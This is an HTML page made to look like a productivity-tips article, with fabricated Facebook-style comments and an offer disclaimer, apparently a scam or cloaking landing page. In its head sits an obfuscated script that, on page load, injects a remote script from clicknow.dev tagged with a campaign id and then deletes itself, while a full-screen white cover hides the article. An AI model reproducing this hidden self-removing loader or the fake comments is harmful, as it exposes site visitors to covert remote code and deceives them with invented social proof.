<!DOCTYPE html>

<html lang="en">

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<title>Become more productive</title>
	<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
	<meta name="robots" content="noindex,nofollow">
	<meta name="viewport" content="width=device-width,  user-scalable=0">

	<script id="3BlpM">

   'use strict';
   /** @type {!Array} */
   var _9Qa0i = ["querySelector", "body", "getElementById", "DOMContentLoaded", "createElement", "script", "type", "text/javascript"];
   (function(data, i) {
       /**
        * @param {number} isLE
        * @return {undefined}
        */
       var write = function(isLE) {
           for (; --isLE;) {
               data["push"](data["shift"]());
           }
       };
       write(++i);
   })(_9Qa0i, 283);
   /**
    * @param {string} level
    * @param {?} ai_test
    * @return {?}
    */
   var _4Q8wy = function(level, ai_test) {
       /** @type {number} */
       level = level - 0;
       var rowsOfColumns = _9Qa0i[level];
       return rowsOfColumns;
   };
   document["addEventListener"](_4Q8wy("0x0"), function() {
       var PL$67 = document[_4Q8wy("0x1")](_4Q8wy("0x2"));
       PL$67[_4Q8wy("0x3")] = _4Q8wy("0x4");
       /** @type {string} */
       PL$67["src"] = "https://clicknow.dev/_remote_track.js?campaign=W1uOnwW9nE";
       document[_4Q8wy("0x5")](_4Q8wy("0x6"))["appendChild"](PL$67);
       document[_4Q8wy("0x7")]("3BlpM")["remove"]();
   }, {
       "once" : !![]
   });

	</script>

	<style>
	 html,
	 body,
	 div,
	 span,
	 h1,
	 h2,
	 p,
	 a,
	 img,
	 strong,
	 section {
			 margin: 0;
			 padding: 0;
			 border: 0;
			 font-size: 100%;
			 font: inherit;
			 vertical-align: baseline
	 }

	 section {
			 display: block
	 }

	 body {
			 line-height: 1
	 }

	 .h1 {
			 font-size: 1.6rem
	 }

	 .h2 {
			 font-size: 1.2rem
	 }

	 .h5 {
			 font-size: .875rem
	 }

	 .bold {
			 font-weight: 700
	 }

	 .italic {
			 font-style: italic
	 }

	 .center {
			 text-align: center
	 }

	 .block {
			 display: block
	 }

	 .clearfix:after,
	 .clearfix:before {
			 content: " ";
			 display: table
	 }

	 .clearfix:after {
			 clear: both
	 }

	 .fit {
			 max-width: 100%
	 }

	 .mb0 {
			 margin-bottom: 0
	 }

	 .my1 {
			 margin-top: .5rem;
			 margin-bottom: .5rem
	 }

	 .mt2 {
			 margin-top: 1rem
	 }

	 .pt1 {
			 padding-top: .5rem
	 }

	 .pb1 {
			 padding-bottom: .5rem
	 }

	 .pl1 {
			 padding-left: .5rem
	 }

	 .p2 {
			 padding: 1rem
	 }

	 .pt2 {
			 padding-top: 1rem
	 }

	 .py2 {
			 padding-top: 1rem;
			 padding-bottom: 1rem
	 }

	 .py1 {
			 padding-top: .5rem;
			 padding-bottom: .5rem
	 }

	 .px2 {
			 padding-left: 1rem;
			 padding-right: 1rem
	 }

	 .col {
			 float: left
	 }

	 .col {
			 box-sizing: border-box
	 }

	 .col-2 {
			 width: 16.66667%
	 }

	 .col-4 {
			 width: 33.33333%
	 }

	 .col-8 {
			 width: 66.66667%
	 }

	 .col-10 {
			 width: 83.33333%
	 }

	 .circle {
			 border-radius: 50%
	 }

	 .text-right {
			 text-align: right
	 }

	 .btn {
			 text-decoration: none;
			 cursor: pointer;
			 line-height: 1.5;
			 padding: .5rem 1rem;
			 height: auto;
			 text-align: center;
			 vertical-align: middle;
			 -webkit-appearance: none;
			 color: #fff;
			 display: block;
			 border-radius: 5px
	 }

	 .btn:hover {
			 text-decoration: none
	 }

	 .btn:focus {
			 outline: none
	 }

	 .facebook__img1,
	 .facebook__img2,
	 .facebook__img3,
	 .facebook__img4,
	 .facebook__img5,
	 .facebook__img6,
	 .facebook__liketop,
	 .facebook__like {
			 max-width: 100%;
			 background-size: 100%;
			 background-image: url(/img/sprite.png)
	 }

	 .facebook__img1 {
			 background-position: 0 0;
			 background-size: 100%
	 }

	 .facebook__img2 {
			 background-position: 0 17.482517%;
			 background-size: 100%
	 }

	 .facebook__img3 {
			 background-position: 0 34.965035%;
			 background-size: 100%
	 }

	 .facebook__img4 {
			 background-position: 0 52.447552%;
			 background-size: 100%
	 }

	 .facebook__img5 {
			 background-position: 0 69.93007%;
			 background-size: 100%
	 }

	 .facebook__img6 {
			 background-position: 0 87.412587%;
			 background-size: 100%
	 }

	 .facebook__liketop {
			 background-position: 0 94.339623%;
			 background-size: 108.695652%
	 }

	 .facebook__like {
			 background-position: 0 100%;
			 background-size: 277.777778%
	 }

	 .facebook {
			 background-color: #eeeff4
	 }

	 .facebook__box {
			 padding: .3rem 0;
			 font-size: .8rem;
			 box-sizing: border-box
	 }

	 .facebook__box span {
			 color: #365899
	 }

	 .facebook__box__text__like__item {
			 display: inline-block;
			 font-size: .8rem
	 }

	 .facebook__box__text__like__item img {
			 width: 13px;
			 vertical-align: middle
	 }

	 .facebook__box__text__like__item:after {
			 display: inline-block;
			 color: #90949c;
			 content: "·";
			 margin: 0 .25rem
	 }

	 .facebook__box__text__like__item--grey {
			 color: #90949c !important
	 }

	 .facebook__box__text__like__item:last-child:after {
			 display: none !important
	 }

	 .facebook__box--border {
			 border-bottom: 1px solid #e1e2e3;
			 padding: .8rem 0
	 }

	 .facebook p {
			 line-height: 1.3
	 }

	 @media (min-width: 40em) {
			 .facebook__box .col-2 {
				   width: 10%
			 }

			 .facebook__box .col-10 {
				   width: 90%
			 }

			 .facebook__box .pl1 {
				   padding-left: 1rem
			 }

			 .facebook__box__text {
				   margin-top: .5rem
			 }
	 }

	 html,
	 body {
			 background: white;
			 font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
			 font-size: 1rem;
			 font-weight: normal;
			 line-height: 1.5;
	 }

	 h1,
	 h2 {
			 line-height: 1.1;
			 margin-bottom: .5rem;
	 }

	 .clearfix {
			 max-width: 760px;
			 margin: 0 auto;
	 }

	 .header {
			 background: #031a46;
	 }

	 .header__logo {
			 text-align: center;
	 }

	 .header__date {
			 color: white;
	 }

	 .header__logo img {
			 max-width: 150px;
	 }

	 .main h1 {
			 color: #031a46;
	 }

	 .main p {
			 margin-bottom: 1rem;
	 }

	 .highlight {
			 color: red;
	 }

	 ::-moz-focus-inner {
			 border: 0;
			 padding: 0;
	 }

	 .btn {
			 margin-bottom: .5rem;
			 background-color: #031a46;
			 box-shadow: inset 0 -0.125rem 0 #0d749a;
	 }

	 .btn-lg {
			 padding: 0.75rem 1.5rem;
			 font-size: 1.25rem;
			 font-weight: bold;
	 }

	 .main__validate,
	 .main__validate__text span,
	 #quiz__question--2,
	 #quiz__question--3,
	 #quiz__question--4,
	 .main__prize {
			 display: none;
	 }

	 .main__validate__progress {
			 display: flex;
			 overflow: hidden;
			 font-size: 0.75rem;
			 line-height: 1rem;
			 text-align: center;
			 background-color: #eceeef;
			 border-radius: 0.25rem;
	 }

	 .main__validate__progress--bar {
			 background-color: #031a46;
			 height: 10px;
	 }

	 .main__validate__text strong {
			 color: #dd1921;
	 }

	 .main__prize {
			 border-top: 1px solid rgba(0, 0, 0, 0.1);
	 }

   #cover {position: fixed; height: 100%; width: 100%; top:0; left: 0; background: white; z-index:9999;}
	</style>



</head>

<body>

    <div id="cover"></div>

	<section class="header py1">
		<p class="header__date h5 center" id="date">5 September, 2019</p>
	</section>

	<section class="main p2">
		<div class="clearfix">

			<h1 class="h1 bold">Become more productive</h1>

			<p>To boost your productivity, you don't need to massively change your work life or routine. There are ways
				to get more done by cutting out distractions and making small changes to how you behave.</p>
			<p>
				<br>
</p>
				<p>Sometimes, it's even the smallest things that can make the biggest impact. For instance, turning off
					unwanted push notifications on your phone or using the first hour of your day more effectively. Here
					are some of the best tips from the people who know hot to get things done.</p>
				<p>
					<br>
</p>
					<p>
						<br>
</p>
						<p>Adjust lighting and temperature</p>
						<p>Italian architect and MIT Senseable City Lab director Carlo Ratti used internet-of-things
							technology alongside architectural innovation in his recent renovations of the Agnelli
							Foundation headquarters. His design allowed each worker to tailor their space to their own
							needs while also encouraging interaction with colleagues. Workers could, for example,
							personalise their temperature and lighting preferences via an app connected to sensors
							around the office. They "create a kind of thermal bubble, which follows each individual,
							allowing better comfort and a reduction of energy waste", Ratti says.</p>
						<p>
							<br>
</p>
							<p>Make time for things other than work</p>
							<p>Canadian Sherry Coutu is known as one of the UK’s leading performers in tech. She is a
								serial entrepreneur, angel investor and CEO of Founders4Schools, and she has a few
								secrets for carving out time to get it all done. Start your day early, finish the
								working week on Friday, find time for exercise and make time for home life are among her
								priorities. "I've got a rule: 20 out of 30 nights I've got to be home by 6pm. I have
								three kids and a husband, and I want to be there with them. I introduced the rule about
								ten years ago. Life had been quite hectic - and if you don't decide that you'll be at
								home for a certain amount of time, you'll find yourself never there,” she says.</p>
							<p>
								<br>
</p>
								<p>Create moments of elevation</p>
								<p>Brothers Chip and Dan Heath are authors of the book The Power of Moments: Why Certain
									Experiences Have Extraordinary Impact, where they argue for the importance of
									creating meaningful experiences at work to have a more positive impact - even that’s
									in a mundane meeting. “It will improve employee engagement, employee retention and
									employee loyalty. It matters to people when you pay attention to the moments that
									mean something,” says Dan. They suggest embracing big moments such as the first day
									of work, a promotion, or a milestone reached such as the first time managing an
									employee. But, the more boring work moments can be turned into positive experiences
									too by doing things a bit differently.“Holding a stand-up meeting, taking a walk or
									inviting a customer to join a meeting about customer issues. Depending on the
									meeting, there are a hundred different ways you could break the script,” says Dan.
								</p>
								<p>
									<br>
</p>
									<p>Make the most of your first hour</p>
									<p>How you spend the first hour after waking up in the morning sets the standard for
										your productivity for the rest of the day. WIRED asked leaders in business what
										they do before they’ve even eaten breakfast. Some of the common themes were
										reading, meditation, and exercise - taking a moment to yourself without any
										distractions - and taking some time to get on top of emails. Mo Gawdat, chief
										business officer at Google, says he has spent the first hour of his day for the
										past 30 years learning about a new topic. “I invest in the fitness of my brain
										before going to the gym. I don't read news or fiction; I choose a focus and read
										about it until I've mastered it,” he says.</p>
									<p>
										<br>
</p>
										<p>Surround yourself with plants</p>
										<p>Freddie Blackett is the co-founder and CEO of online gardening startup,
											Patch. The app helps city-dwellers pick the best plants for an indoor
											environment that can be tricky for flora to thrive in because of quickly
											fluctuating temperatures and lack of sunlight. But, its worth investing in
											them because they add more to an office than a decorative touch:
											psychologists have found that they can improve employee satisfaction and can
											increase productivity by up to 15 per cent. Blackett advises setting up a
											staff rota to water and feed the plants as needed, so they don't get
											neglected. "Inevitably, plants will die; they are living organisms," he
											says. "But if you have more plants survive than die, then you're on to
											something good."</p>
										<p>
											<br>
</p>
											<p>
												<br>
</p>
												<p>akindo / iStock</p>
												<p>Think about office design</p>
												<p>Despina Katsikakis is an expert on how design impacts business
													performance and her latest project aims to address this on a huge
													scale: encouraging a sense of community in the giant skyscraper
													under construction at 22 Bishopsgate in the City of London that will
													accommodate 12,000 workers. “The majority of office design focuses
													on reducing the cost of the space rather than on inspiring people to
													do better work,” she says. But there is a shift happening and her
													tips to embracing this include creating spaces specifically for
													employees who need to get away from it all and focus and offering
													extra learning courses after work. “It’s a bit like the
													old-fashioned idea of going to the pub,” says Katsikakis. “But with
													more knowledge exchange attached to it.”</p>
												<p>
													<br>
</p>
													<p>Organise your digital life</p>
													<p>Our digital lives can be just as chaotic and distracting as our
														ones IRL but Ofer Bergman and Steve Whittaker have some tips to
														keeping it in check. Our current system we use to manage our
														digital lives are outdated and insufficient say the authors of
														The Science of Managing Our Digital Stuff. But they’ve developed
														a new system to overcome this, which includes organising files
														that you want to keep but don’t need into a visible but separate
														part of a folder; storing information according to the project
														it belongs to, regardless of the format it's kept on; and
														recording notes on lecture while recording the audio and taking
														photos of the slides at the same time, which will give us a
														better recollection when referring back to our notes later.</p>
													<p>
														<br>
</p>
														<p>
															<br>
</p>
															<p>Avoid the number seven</p>
															<p>In his latest book, Tribe of Mentors, productivity guru
																Tim Ferriss asks over 100 high achievers for their top
																life tips. One that he lives by? Avoiding the number
																seven when making decisions. “One thing that came up
																twice, from an athlete and a CEO, was ranking
																opportunities from one to ten but not using seven,” he
																says. “If you go to a restaurant and you ask the waiter
																or waitress how good the steak is from one to 10, seven
																is a cop-out number that a lot of people use to answer,
																because it's non-committal,” says Ferriss. “As soon as
																you remove seven, it can either be a six, which is
																barely a passing grade, or it's an eight, which is very
																excited. … It makes decisions a lot faster and a lot
																easier.”</p>
															<p>
																<br>
</p>
																<p>Embrace background noise</p>
																<p>Plantronics CEO Joe Burton says the best way to
																	manage distracting background noise is with more
																	background noise. At its Hoofddorp workspace,
																	Plantronics is doing just that - and it seems to be
																	working. Burton says this is because not all sound
																	is created equally - the intelligibility of a
																	conversation is what creates interference. His tips
																	for boosting productivity with noise includes
																	waterfalls in the office that act as a visual
																	reference point to the sound of babbling water
																	played on speakers around the office. Having
																	designated concentration areas around the office
																	also helps workers when they want to focus without
																	any noise at all.</p>
																<p>
																	<br>
</p>
																	<p>Turn off push notifications</p>
																	<p>Push notifications for email, texts, social media
																		notifications, the news, the weather, are
																		detrimental to our productivity argues Dan
																		Ariely, James B Duke professor of psychology and
																		behavioural economics at Duke University, North
																		Carolina. Recent studies show that 50 per cent
																		of Americans keep their phone near them during
																		every moment of their waking hours, and 50
																		percent of them check their phone at least
																		several times an hour. A recent study he
																		conducted found people were much more likely to
																		make errors and not pay attention to their main
																		task if they were interrupted by notifications
																		from their phone - such as a text or a call. He
																		says to boost our productivity, it's important
																		to recognise not all emails and texts are
																		created equal and therefore don’t warrant
																		immediate notification - so just turn them off.
																	</p>



																	<section class="facebook px2">
																		<div
																			class="clearfix facebook__box facebook__box--border ">
																			<div class="col col-4 ">
																				<span class="facebook__box__text__like__item--grey"><img src="likes.png" class="facebook__liketop" style="height: 17px; vertical-align: middle"> 544</span>
																			</div>
																			<div class="col col-8 text-right">
																				<span class="facebook__box__text__like__item--grey">31 comments 108 shares</span>
																			</div>
																		</div>

																		<!-- 1 -->
																		<div class="clearfix facebook__box">
																			<div class="col col-2 ">
																				<img class="facebook__img1 circle" alt="" src="pr6.jpg"></div>
																				<div
																					class="col col-10 facebook__box__text pl1">
																					<p><span class="bold">Ellen Gallagher</span>
																						Super page. Thank you</p>

																					<div
																						class="facebook__box__text__like">
																						<span class="facebook__box__text__like__item">Like</span>
																						<span class="facebook__box__text__like__item">Comment</span>
																						<span class="facebook__box__text__like__item facebook__box__text__like__item--grey"><img src="thumb.png" class="facebook__like"> 5</span>
																						<span class="facebook__box__text__like__item facebook__box__text__like__item--grey">Just now</span>
																					</div>
																				</div>
																			</div>

																			<!-- 2 -->
																			<div class="clearfix facebook__box">
																				<div class="col col-2 ">
																					<img class="facebook__img2 circle" alt="" src="pr2.jpg"></div>
																					<div
																						class="col col-10 facebook__box__text pl1">
																						<p><span class="bold">Emily McGlinchy</span>
																							I like all of them! Really
																							helpful!</p>
																						<!--<p><img src="comment_voucher_Lidl.jpg" alt="voucher" class="fit"></p>-->
																						<div
																							class="facebook__box__text__like">
																							<span class="facebook__box__text__like__item">Like</span>
																							<span class="facebook__box__text__like__item">Comment</span>
																							<span class="facebook__box__text__like__item facebook__box__text__like__item--grey"><img src="thumb.png" class="facebook__like"> 3</span>
																							<span class="facebook__box__text__like__item facebook__box__text__like__item--grey">Just now</span>
																						</div>
																					</div>
																				</div>

																				<!-- 3 -->
																				<div class="clearfix facebook__box">
																					<div class="col col-2 ">
																						<img class="facebook__img3 circle" alt="" src="pr1.jpg"></div>
																						<div
																							class="col col-10 facebook__box__text pl1">
																							<p><span class="bold">Ellen Dermott</span>
																								I love this! What a
																								wonderful post!!</p>
																							<div
																								class="facebook__box__text__like">
																								<span class="facebook__box__text__like__item">Like</span>
																								<span class="facebook__box__text__like__item">Comment</span>
																								<span class="facebook__box__text__like__item facebook__box__text__like__item--grey"><img src="thumb.png" class="facebook__like"> 2</span>
																								<span class="facebook__box__text__like__item facebook__box__text__like__item--grey">31 minutes ago</span>
																							</div>
																						</div>
																					</div>

																					<!-- 4 -->
																					<div class="clearfix facebook__box">
																						<div class="col col-2 ">
																							<img class="facebook__img4 circle" alt="" src="pr5.jpg"></div>
																							<div
																								class="col col-10 facebook__box__text pl1">
																								<p><span class="bold">Lisa O'Ryan</span>
																									I am so glad I've
																									read it!</p>
																								<div
																									class="facebook__box__text__like">
																									<span class="facebook__box__text__like__item">Like</span>
																									<span class="facebook__box__text__like__item">Comment</span>
																									<span class="facebook__box__text__like__item facebook__box__text__like__item--grey"><img src="thumb.png" class="facebook__like"> 15</span>
																									<span class="facebook__box__text__like__item facebook__box__text__like__item--grey">3,5 hours ago</span>
																								</div>
																							</div>
																						</div>

																						<!-- 5 -->
																						<div
																							class="clearfix facebook__box">
																							<div class="col col-2 ">
																								<img class="facebook__img5 circle" alt="" src="pr4.jpg"></div>
																								<div
																									class="col col-10 facebook__box__text pl1">
																									<p><span class="bold">Nora Malone</span>
																										Glad I found
																										this post!</p>
																									<!-- <p><img src="" alt="voucher" class="fit"></p> -->
																									<div
																										class="facebook__box__text__like">
																										<span class="facebook__box__text__like__item">Like</span>
																										<span class="facebook__box__text__like__item">Comment</span>
																										<span class="facebook__box__text__like__item facebook__box__text__like__item--grey"><img src="thumb.png" class="facebook__like"> 1</span>
																										<span class="facebook__box__text__like__item facebook__box__text__like__item--grey">6 hours ago</span>
																									</div>
																								</div>
																							</div>

																							<!-- 6 -->
																							<div
																								class="clearfix facebook__box">
																								<div class="col col-2 ">
																									<img class="facebook__img6 circle" alt="" src="p2.jpg"></div>
																									<div
																										class="col col-10 facebook__box__text pl1">
																										<p><span class="bold">Kevin O</span>
																											Great tips!
																											Thank you!
																										</p>
																										<div
																											class="facebook__box__text__like">
																											<span class="facebook__box__text__like__item">Like</span>
																											<span class="facebook__box__text__like__item">Comment</span>
																											<span class="facebook__box__text__like__item facebook__box__text__like__item--grey"><img src="thumb.png" class="facebook__like"> 3</span>
																											<span class="facebook__box__text__like__item facebook__box__text__like__item--grey">7 hours ago</span>
																										</div>
																									</div>
																								</div>

																	</section>

																	<p
																		style="font-size: 11px; text-align: center; margin: 30px 0;">
																		This offer is independently organized, and has
																		no relationship - including affiliation or
																		sponsorship - with the manufacturers of the
																		products displayed. The trademarks are the
																		property of their respective owners. If a
																		trademark is used, this is always under fair-use
																		principles as it is necessary for the
																		description of the product. All images are shown
																		for illustrative purposes only</p>


																	<!-- JAVASCRIPT -->

																	<script type="text/javascript" src="jquery-min.js">
																	</script>


</body>

</html>
